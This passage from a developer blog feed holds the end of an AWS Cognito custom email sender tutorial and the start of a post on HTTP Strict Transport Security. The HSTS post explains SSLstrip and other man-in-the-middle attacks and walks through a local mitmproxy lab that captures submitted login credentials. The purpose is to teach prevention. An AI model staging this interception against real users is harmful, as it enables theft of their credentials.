</p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"triggerSource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"CustomEmailSender_ForgotPassword"</span><span class="p">,</span><span class="w"> </span><span class="nl">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"userPoolId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1_LnS..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"userName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"54cf7eb7-0b96-4304-..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"callerContext"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"awsSdkVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"aws-sdk-nodejs-2.856.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"clientId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"6u7c9vr3pkstoog..."</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"request"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"customEmailSenderRequestV1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"code"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AYADeILxywKhhaq8Ys4mh0aHutYAgQACABVhd3MtY3J5c..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"clientMetadata"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="nl">"userAttributes"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"sub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"54cf7eb7-0b96-4304-8d6b-..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"email_verified"</span><span class="p">:</span><span class="w"> </span><span class="s2">"true"</span><span class="p">,</span><span class="w"> </span><span class="nl">"cognito:user_status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"CONFIRMED"</span><span class="p">,</span><span class="w"> </span><span class="nl">"cognito:email_alias"</span><span class="p">:</span><span class="w"> </span><span class="s2">"hello@maxivanov.io"</span><span class="p">,</span><span class="w"> </span><span class="nl">"phone_number_verified"</span><span class="p">:</span><span class="w"> </span><span class="s2">"false"</span><span class="p">,</span><span class="w"> </span><span class="nl">"phone_number"</span><span class="p">:</span><span class="w"> </span><span class="s2">"..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"given_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Max"</span><span class="p">,</span><span class="w"> </span><span class="nl">"family_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Ivanov"</span><span class="p">,</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="s2">"hello@maxivanov.io"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Create Lambda function (infra) </h2> <p>We will define a Node.js Lambda that will be triggered by Cognito each time an email should be sent. It's deployed as a ZIP file. The only part that is unique to the custom senders trigger is the environment variables.</p> <p>We need a variable for the KMS key ID and another for the email provider API key.</p> <p><strong>CloudFormation</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">Parameters</span><span class="pi">:</span> <span class="s">...</span> <span class="s">SendgridApiKey</span><span class="pi">:</span> <span class="na">Description</span><span class="pi">:</span> <span class="s">Sendgrid API key</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">String</span> <span class="na">Resources</span><span class="pi">:</span> <span class="s">...</span> <span class="s">LambdaTrigger</span><span class="pi">:</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">AWS::Lambda::Function</span> <span class="na">Properties</span><span class="pi">:</span> <span class="na">Code</span><span class="pi">:</span> <span class="s2">"</span><span class="s">../lambda"</span> <span class="na">Environment</span><span class="pi">:</span> <span class="na">Variables</span><span class="pi">:</span> <span class="na">KEY_ID</span><span class="pi">:</span> <span class="kt">!GetAtt</span> <span class="s">KmsKey.Arn</span> <span class="na">SENDGRID_API_KEY</span><span class="pi">:</span> <span class="kt">!Ref</span> <span class="s">SendgridApiKey</span> <span class="na">FunctionName</span><span class="pi">:</span> <span class="kt">!Sub</span> <span class="s">${ProjectName}-lambda-custom-email-sender-trigger</span> <span class="na">PackageType</span><span class="pi">:</span> <span class="s">Zip</span> <span class="na">Role</span><span class="pi">:</span> <span class="kt">!GetAtt</span> <span class="s">LambdaTriggerRole.Arn</span> <span class="na">Runtime</span><span class="pi">:</span> <span class="s">nodejs12.x</span> <span class="na">Handler</span><span class="pi">:</span> <span class="s">index.handler</span> </code></pre> </div> <p>If you're familiar with CloudFormation, there shouldn't be any surprises.</p> <p><strong>Terraform</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"archive_file"</span> <span class="s2">"lambda"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"zip"</span> <span class="nx">source_dir</span> <span class="p">=</span> <span class="s2">"../lambda"</span> <span class="nx">output_path</span> <span class="p">=</span> <span class="s2">"lambda.zip"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_lambda_function"</span> <span class="s2">"lambda_function_trigger"</span> <span class="p">{</span> <span class="nx">environment</span> <span class="p">{</span> <span class="nx">variables</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">KEY_ID</span> <span class="p">=</span> <span class="nx">aws_kms_key</span><span class="err">.</span><span class="nx">kms_key</span><span class="err">.</span><span class="nx">arn</span> <span class="nx">SENDGRID_API_KEY</span> <span class="p">=</span> <span class="nx">var</span><span class="err">.</span><span class="nx">sendgrid_api_key</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">code_signing_config_arn</span> <span class="p">=</span> <span class="s2">""</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">""</span> <span class="nx">filename</span> <span class="p">=</span> <span class="nx">data</span><span class="err">.</span><span class="nx">archive_file</span><span class="err">.</span><span class="nx">lambda</span><span class="err">.</span><span class="nx">output_path</span> <span class="nx">function_name</span> <span class="p">=</span> <span class="s2">"${var.project}-lambda-function-trigger"</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="err">.</span><span class="nx">iam_role</span><span class="err">.</span><span class="nx">arn</span> <span class="nx">handler</span> <span class="p">=</span> <span class="s2">"index.handler"</span> <span class="nx">runtime</span> <span class="p">=</span> <span class="s2">"nodejs12.x"</span> <span class="nx">source_code_hash</span> <span class="p">=</span> <span class="nx">filebase64sha256</span><span class="err">(</span><span class="nx">data</span><span class="err">.</span><span class="nx">archive_file</span><span class="err">.</span><span class="nx">lambda</span><span class="err">.</span><span class="nx">output_path</span><span class="err">)</span> <span class="p">}</span> </code></pre> </div> <p>Thanks to the <code>source_code_hash</code>, each time the function code is modified, the resource will be marked as changed and the code will get redeployed.</p> <h2> Create Cognito User Pool </h2> <p>This is the most confusing part. We need to set the <code>LambdaConfig</code> setting of the User Pool. It is an object storing <strong>configuration of Lambda triggers</strong> invoked by Cognito. 2 new options we're interested in are:</p> <ul> <li><code>CustomEmailSender: { LambdaArn: "...", LambdaVersion: "..." }</code></li> <li><code>KMSKeyID: "..."</code></li> </ul> <p>The process is straightforward with CloudFormation but requires a workaround in Terraform. Details below.</p> <p><strong>CloudFormation</strong></p> <p>The official docs say setting the custom sender options is <a href="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cognito-userpool-lambdaconfig.html#cfn-cognito-userpool-lambdaconfig-customemailsender">Not currently supported by AWS CloudFormation</a>. But lucky we, that's not the case. It worked perfectly in multiple tests I ran.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">Resources</span><span class="pi">:</span> <span class="na">UserPool</span><span class="pi">:</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">AWS::Cognito::UserPool</span> <span class="na">Properties</span><span class="pi">:</span> <span class="na">AccountRecoverySetting</span><span class="pi">:</span> <span class="na">RecoveryMechanisms</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">Name</span><span class="pi">:</span> <span class="s">verified_email</span> <span class="na">Priority</span><span class="pi">:</span> <span class="m">1</span> <span class="na">AutoVerifiedAttributes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">email</span> <span class="na">LambdaConfig</span><span class="pi">:</span> <span class="na">CustomEmailSender</span><span class="pi">:</span> <span class="na">LambdaArn</span><span class="pi">:</span> <span class="kt">!GetAtt</span> <span class="s">LambdaTrigger.Arn</span> <span class="na">LambdaVersion</span><span class="pi">:</span> <span class="s2">"</span><span class="s">V1_0"</span> <span class="na">KMSKeyID</span><span class="pi">:</span> <span class="kt">!GetAtt</span> <span class="s">KmsKey.Arn</span> <span class="na">UsernameConfiguration</span><span class="pi">:</span> <span class="na">CaseSensitive</span><span class="pi">:</span> <span class="no">false</span> <span class="na">UserPoolName</span><span class="pi">:</span> <span class="kt">!Sub</span> <span class="s">${ProjectName}-user-pool</span> <span class="na">UsernameAttributes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">email</span> <span class="na">Policies</span><span class="pi">:</span> <span class="na">PasswordPolicy</span><span class="pi">:</span> <span class="na">MinimumLength</span><span class="pi">:</span> <span class="m">10</span> <span class="na">Schema</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">Name</span><span class="pi">:</span> <span class="s">name</span> <span class="na">AttributeDataType</span><span class="pi">:</span> <span class="s">String</span> <span class="na">Mutable</span><span class="pi">:</span> <span class="no">true</span> <span class="na">Required</span><span class="pi">:</span> <span class="no">true</span> <span class="pi">-</span> <span class="na">Name</span><span class="pi">:</span> <span class="s">email</span> <span class="na">AttributeDataType</span><span class="pi">:</span> <span class="s">String</span> <span class="na">Mutable</span><span class="pi">:</span> <span class="no">true</span> <span class="na">Required</span><span class="pi">:</span> <span class="no">true</span> </code></pre> </div> <p><code>LambdaConfig:</code> is the part of the most interest above.</p> <p><strong>Terraform</strong></p> <p>There's an <a href="https://github.com/hashicorp/terraform-provider-aws/issues/16760">open issue</a> to track the feature status in Terraform. But what can we do now, before it's available? <code>null_resource</code> can help to pull this off, but still there are some gotchas.</p> <p>Unlinke the CloudFormation definition, we don't add anything <code>CustomEmailSender</code>-related in the resource definition, so that's your good old Cognito User Pool in Terraform:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_cognito_user_pool"</span> <span class="s2">"cognito_user_pool"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.project}-cognito-user-pool"</span> <span class="nx">account_recovery_setting</span> <span class="p">{</span> <span class="nx">recovery_mechanism</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"verified_email"</span> <span class="nx">priority</span> <span class="p">=</span> <span class="mi">1</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">auto_verified_attributes</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"email"</span><span class="p">]</span> <span class="nx">password_policy</span> <span class="p">{</span> <span class="nx">minimum_length</span> <span class="p">=</span> <span class="mi">10</span> <span class="nx">temporary_password_validity_days</span> <span class="p">=</span> <span class="mi">7</span> <span class="nx">require_lowercase</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">require_numbers</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">require_symbols</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">require_uppercase</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="nx">schema</span> <span class="p">{</span> <span class="nx">attribute_data_type</span> <span class="p">=</span> <span class="s2">"String"</span> <span class="nx">developer_only_attribute</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">mutable</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"email"</span> <span class="nx">required</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">string_attribute_constraints</span> <span class="p">{</span> <span class="nx">max_length</span> <span class="p">=</span> <span class="s2">"2048"</span> <span class="nx">min_length</span> <span class="p">=</span> <span class="s2">"0"</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">schema</span> <span class="p">{</span> <span class="nx">attribute_data_type</span> <span class="p">=</span> <span class="s2">"String"</span> <span class="nx">developer_only_attribute</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">mutable</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"name"</span> <span class="nx">required</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">string_attribute_constraints</span> <span class="p">{</span> <span class="nx">max_length</span> <span class="p">=</span> <span class="s2">"2048"</span> <span class="nx">min_length</span> <span class="p">=</span> <span class="s2">"0"</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">username_attributes</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"email"</span><span class="p">]</span> <span class="nx">username_configuration</span> <span class="p">{</span> <span class="nx">case_sensitive</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>In order to set the Lambda configuration in the user pool, we will use the <code>aws cognito-idp update-user-pool --lambda-config "CustomEmailSender={LambdaVersion=V1_0,LambdaArn=...</code> AWS CLI command. </p> <p>The problem is, if you don't pass all the other relevant pool options to this command, they will be <strong>reset to the default values</strong>. Suggested solution:</p> <p>1. Deploy Terraform stack <strong>without setting the lambda config</strong></p> <p>2. Generate a <strong>skeleton of the input variables</strong> expected by the <code>update-user-pool</code> command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws cognito-idp update-user-pool <span class="nt">--user-pool-id</span> us-east-1_evzTb... <span class="nt">--generate-cli-skeleton</span> input </code></pre> </div> <p>3. Fetch the <strong>current configuration</strong> of the user pool:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws cognito-idp describe-user-pool <span class="nt">--user-pool-id</span> us-east-1_evzTb... <span class="nt">--query</span> UserPool <span class="o">&gt;</span> input.json </code></pre> </div> <p>4. From the fetched config, <strong>remove the keys</strong> that are not listed in the skeleton. Only configuration options accepted by the <code>update-user-pool</code> must be left. One can probably come up with a script to do this automatically... but I edited it manually.</p> <p>5. Add and <strong>deploy the new <code>null_resource</code></strong> with Terraform.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">locals</span> <span class="p">{</span> <span class="nx">update_user_pool_command</span> <span class="p">=</span> <span class="s2">"aws cognito-idp update-user-pool --user-pool-id ${aws_cognito_user_pool.cognito_user_pool.id} --cli-input-json file://${var.update_user_pool_config_file} --lambda-config </span><span class="se">\"</span><span class="s2">CustomEmailSender={LambdaVersion=V1_0,LambdaArn=${aws_lambda_function.lambda_function_trigger.arn}},KMSKeyID=${aws_kms_key.kms_key.arn}</span><span class="se">\"</span><span class="s2">"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"null_resource"</span> <span class="s2">"cognito_user_pool_lambda_config"</span> <span class="p">{</span> <span class="nx">provisioner</span> <span class="s2">"local-exec"</span> <span class="p">{</span> <span class="nx">command</span> <span class="p">=</span> <span class="nx">local</span><span class="err">.</span><span class="nx">update_user_pool_command</span> <span class="p">}</span> <span class="nx">depends_on</span> <span class="p">=</span> <span class="p">[</span><span class="nx">local</span><span class="err">.</span><span class="nx">update_user_pool_command</span><span class="p">]</span> <span class="nx">triggers</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">input_json</span> <span class="p">=</span> <span class="nx">filemd5</span><span class="err">(</span><span class="nx">var</span><span class="err">.</span><span class="nx">update_user_pool_config_file</span><span class="err">)</span> <span class="nx">update_user_pool_command</span> <span class="p">=</span> <span class="nx">local</span><span class="err">.</span><span class="nx">update_user_pool_command</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>A quick comment on what's happenning here. We define a local value with the <code>update-user-pool</code> command. It accepts the user pool ID, the JSON file with current user pool configuration prepared in step <code>4.</code>, and the lambda config. Terraform <code>null</code> resource executes the command the first time you run <code>apply</code> and every time the <strong>command or the config file are updated</strong>.</p> <p>If you get the <em>"Error parsing parameter 'cli-input-json': Invalid JSON received."</em> error, make sure the path to the input parameters json is correct and is prefixed with <code>file://</code>. I.e. <code>--cli-input-json file://${var.update_user_pool_config_file}</code>.</p> <p>If you get the <em>"Parameter validation failed: Unknown parameter in input: "Id", ..."</em> error, make sure you removed all keys not supported by the <code>update-user-pool</code> from the parameters file.</p> <p>If you get the <em>"An error occurred (InvalidParameterException) when calling the UpdateUserPool operation: Please use TemporaryPasswordValidityDays in PasswordPolicy instead of UnusedAccountValidityDays"</em> error, remove the <code>AdminCreateUserConfig.UnusedAccountValidityDays</code> setting. It is replaced by <code>Policies.PasswordPolicy.TemporaryPasswordValidityDays</code>.</p> <h2> Make sure it works </h2> <p>Once all the resources are deployed we can register a new user to make sure the email with a <strong>code is sent by the ESP</strong>.</p> <p>With CloudFormation you can find out the Cognito User Pool Client ID with<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws cloudformation describe-stacks <span class="nt">--stack-name</span> cognito-custom-email-sender-cf-stack <span class="nt">--query</span> <span class="s2">"Stacks[0].Outputs"</span> </code></pre> </div> <p>With Terraform, it will be listed in the outputs.</p> <p>Register a new user:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws cognito-idp sign-up <span class="nt">--client-id</span> &lt;CLIENT_ID&gt; <span class="nt">--username</span> hello@maxivanov.io <span class="nt">--password</span> &lt;PASSOWORD&gt; <span class="nt">--user-attributes</span> <span class="nv">Name</span><span class="o">=</span><span class="s2">"name"</span>,Value<span class="o">=</span><span class="s2">"Max Ivanov"</span> <span class="o">{</span> <span class="s2">"UserConfirmed"</span>: <span class="nb">false</span>, <span class="s2">"CodeDeliveryDetails"</span>: <span class="o">{</span> <span class="s2">"Destination"</span>: <span class="s2">"h***@m***.io"</span>, <span class="s2">"DeliveryMedium"</span>: <span class="s2">"EMAIL"</span>, <span class="s2">"AttributeName"</span>: <span class="s2">"email"</span> <span class="o">}</span>, <span class="s2">"UserSub"</span>: <span class="s2">"51c9045e-2f3e-4..."</span> <span class="o">}</span> </code></pre> </div> <p>It worked!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--gf-HLM5r--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/03/send-aws-cognito-emails-with-3rd-party-esps/email-success.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--gf-HLM5r--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/03/send-aws-cognito-emails-with-3rd-party-esps/email-success.webp" alt="email success"></a></p> <p>If you get <em>index.handler is undefined or not exported</em> error in CloudWatch, make sure you zipped only the function files, and not the containing folder.</p> <p>If you get <em>KMS key arn must be a string.</em> or <em>Unable to decrypt data key and one or more KMS CMKs had an error.</em> error in CloudWatch, make sure you're passing the KMS key in the environment variables to the Lambda and the value is ARN of the KMS key and not its ID.</p> <h2> Cleanup </h2> <p>At least destroying resources is much easier!</p> <p><strong>CloudFormation</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws cloudformation delete-stack <span class="nt">--stack-name</span> cognito-custom-email-sender-cf-stack </code></pre> </div> <p><strong>Terraform</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>terraform destroy </code></pre> </div> <h2> References </h2> <ul> <li><a href="https://docs.aws.amazon.com/cognito/latest/developerguide/user-pool-lambda-custom-sender-triggers.html">https://docs.aws.amazon.com/cognito/latest/developerguide/user-pool-lambda-custom-sender-triggers.html</a></li> <li><a href="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cognito-userpool-lambdaconfig.html#cfn-cognito-userpool-lambdaconfig-customemailsender">https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cognito-userpool-lambdaconfig.html#cfn-cognito-userpool-lambdaconfig-customemailsender</a></li> <li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html">https://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html</a></li> <li><a href="https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cognito-idp/update-user-pool.html">https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cognito-idp/update-user-pool.html</a></li> <li><a href="https://github.com/hashicorp/terraform-provider-aws/issues/16760">https://github.com/hashicorp/terraform-provider-aws/issues/16760</a></li> </ul> <h2> ... </h2> <p>You are now not limited in how you can send email and SMS notifications in Cognito. Use whichever notification service/provider fits your project needs better.</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> aws cognito cloudformation terraform Ultimate guide to HTTP Strict Transport Security (HSTS) Max Ivanov Wed, 03 Mar 2021 23:42:04 +0000 https://forem.com/maxivanov/ultimate-guide-to-http-strict-transport-security-hsts-cob https://forem.com/maxivanov/ultimate-guide-to-http-strict-transport-security-hsts-cob <p>This is a post in the series on Node.js security best practices. Each post covers one security best practice in detail.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Problem → Example attack → Solution → Implementation in Node.js → Implications </code></pre> </div> <p>Code for this post's <a href="https://github.com/maximivanov/vulnerable-by-design/tree/main/hsts" rel="noopener noreferrer">vulnerable demo project</a>.</p> <p>Today's topic is the <em>HTTP Strict Transport Security (HSTS)</em> policy.</p> <p>Nowadays, serving websites and APIs over a secure (SSL/TLS) channel is the default mode of deployment. <br> You can have a free certificate from your cloud provider (AWS, Azure, Cloudflare) or you can generate one with LetsEncrypt.<br> You install the certificate, configure the HTTP → HTTPS redirect... your and your visitors' data is safe now.</p> <p>Or is it? Unfortunately, not always. Your web app may still be vulnerable to the <strong>Man-in-the-Middle</strong> (MITM) attacks.<br> If you're curious how, read on - we will simulate such an attack in the local environment and then will see how to prevent it from the code in Node.js.</p> <p>We will see what HSTS is from the developer's point of view:</p> <ul> <li>Does it apply to websites only or to APIs as well?</li> <li>What are HSTS preloaded lists?</li> <li>How to safely deploy HSTS in production?</li> <li>What are the limitations and implications of enabling the policy?</li> </ul> <h2> The problem </h2> <p>So what's the vulnerable scenario to consider?</p> <p>Even if you have the HTTP to HTTPS redirect on your website, the <strong>initial request</strong> a user makes may be sent over the <strong>insecure connection</strong>. That's when it can be intercepted and modified by <strong>any router/proxy</strong> sitting in between the user and the server.</p> <p>Imagine you're that poor <em>about-to-be-victim</em>. You're in the airport waiting for your flight bored to death. You pull out your phone, scroll through the list of public wifi access points and choose legitemately-looking <em>JFK Free Wi-Fi</em>.<br> Too bad the access point was set up by another bored soul - a tech-savvy teenager sitting next to you!</p> <p>In the browser you enter your favorite procrastination resource <em>example.com</em>. </p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fmitm-flow.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fmitm-flow.webp" alt="mitm flow"></a></p> <ol> <li>Your browser makes a <code>GET</code> HTTP request to <code>http://example.com</code>. It is intercepted by the MITM and forwarded to the server.</li> <li>Server replies with <code>301 Location: https://example.com</code> redirect. Fake access point rewrites all https urls in the response (headers included) to http versions.</li> <li>Your browser sees a redirect to <code>http://example.com</code>. What the hell, isn't it the same url that was just requested? OK, following the redirect.</li> <li>MITM intercepts the request and rewrites it to <code>https://example.com</code>. The server returns the page to the MITM via the secure TLS connection.</li> <li>MITM returns the page to you via the insecure connection. </li> <li>You go to the login page, enter your credentials and submit the form. MTIM proxies that request, storing your password in the log for the attacker to review later.</li> </ol> <p>In fact, in your communication with example.com, even though it enforces the HTTP-to-HTTPS redirect, not a single page was served to you via HTTPS.<br> Browsers may show a warning to signal the connection is not secure but you were so desperate to see the latest jokes that you ignored the warning.</p> <p>This type of attack is called <strong>SSLstrip</strong> - the secure transport communication between you and the server is removed.</p> <p>Is SSL Strip the only possible attack? Glad you asked, there are more!</p> <ul> <li> <em>Cookie Hijacking</em> attack where the <strong>unencrypted traffic on a public wireless network</strong> can be monitored for secrets in cookies sent in plain text.</li> <li>Instead of proxying user's traffic to <code>example.com</code>, MITM redirects the browser to <strong>attacker's owned phish</strong> <code>examp1e.com</code> (note letter <code>l</code> replaced with <code>1</code>). This website looks exactly the same as original. It has a valid TLS certificate and the browser will be happy. Users may spot the change in the URL... or they may not.</li> <li>Instead of downgrading the secure channel for the user, MITM can respond with a self-signed certificate. Again the browser will warn about suspicous certificate but the user may simply <strong>click-through the warning</strong>: <em>Ignore it, I don't mind, I need my instant gratification here and now</em>.</li> </ul> <p>What if we stop serving HTTP traffic altogether (close port 80 on the server)? It won't help, because the problem is not with server responding to HTTP, it's about browser <strong>attempting to request via HTTP</strong>.</p> <h2> Example attack: SSLstrip </h2> <p>You can find a vulnerable project demonstrating the SSLstrip attack in the <a href="https://github.com/maximivanov/vulnerable-by-design/tree/main/hsts" rel="noopener noreferrer">series repo</a>.</p> <p>If you want to run it yourself, you will only need Docker installed on your machine. Clone the repo and switch to the <code>hsts</code> folder.</p> <p>Below are the steps to reproduce the attack along with brief comments:</p> <p>1. Generate a local root Certificate Authority (CA). For the test to be realistic, we need a website protected with a valid (as the browser sees it) certificate. <a href="https://github.com/FiloSottile/mkcert" rel="noopener noreferrer">mkcert</a> is a great tool that makes it simple to generate TLS certificates for local development.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mkcert <span class="nt">-install</span> </code></pre> </div> <p>2. Generate certificate valid for <code>localhost</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mkcert <span class="nt">-cert-file</span> localhost-cert.pem <span class="nt">-key-file</span> localhost-key.pem localhost 127.0.0.1 </code></pre> </div> <p>3. Build the Docker image. It is based on the official Node.js image. It also contains <a href="https://mitmproxy.org/" rel="noopener noreferrer">mitmproxy</a> to simulate the MITM router as well as a script to facilitate the SSLstrip attack.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker build <span class="nt">-t</span> mitmproxy-node - &lt; Dockerfile </code></pre> </div> <p>4. Start a container. It mounts current directory with the Node.js code and root CA certificate generated in step 1. Additionally it maps ports <code>80</code> and <code>443</code> to serve the website and port <code>8080</code> where <code>mitmproxy</code> listens.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">-it</span> <span class="se">\</span> <span class="nt">--rm</span> <span class="se">\</span> <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">:/var/app"</span> <span class="se">\</span> <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span>mkcert <span class="nt">-CAROOT</span><span class="si">)</span><span class="s2">:/var/mkcert"</span> <span class="se">\</span> <span class="nt">-p</span> 127.0.0.1:80:80 <span class="se">\</span> <span class="nt">-p</span> 127.0.0.1:443:443 <span class="se">\</span> <span class="nt">-p</span> 127.0.0.1:8080:8080 <span class="se">\</span> <span class="nt">-w</span> /var/app <span class="se">\</span> mitmproxy-node bash </code></pre> </div> <p>5. Start the server (web app)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>node index.js </code></pre> </div> <p>6. In a separate tab on your host machine, connect to the running container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker <span class="nb">exec</span> <span class="nt">-it</span> <span class="nt">-w</span> /var/mitmproxy <span class="si">$(</span>docker ps <span class="nt">-a</span> <span class="nt">-q</span> <span class="nt">--filter</span> <span class="nv">ancestor</span><span class="o">=</span>mitmproxy-node<span class="si">)</span> bash </code></pre> </div> <p>7. Start mitmproxy<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mitmproxy <span class="nt">--set</span> <span class="nv">ssl_verify_upstream_trusted_ca</span><span class="o">=</span>/var/mkcert/rootCA.pem <span class="nt">-s</span> sslstrip.py </code></pre> </div> <p>8. Configure your browser to use HTTP proxy at <code>127.0.0.1:8080</code></p> <p>9. Visit <a href="http://localhost" rel="noopener noreferrer">http://localhost</a> in the browser and click through the user flow entering your login and password (can be anything).</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fmitmproxy-requests.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fmitmproxy-requests.webp" alt="mitmproxy requests"></a></p> <p>You can see the requests made by the browser in <code>mitmproxy</code>:</p> <p>If you expand the <code>POST</code> request, you will see the credentials were intercepted:</p> <p><a 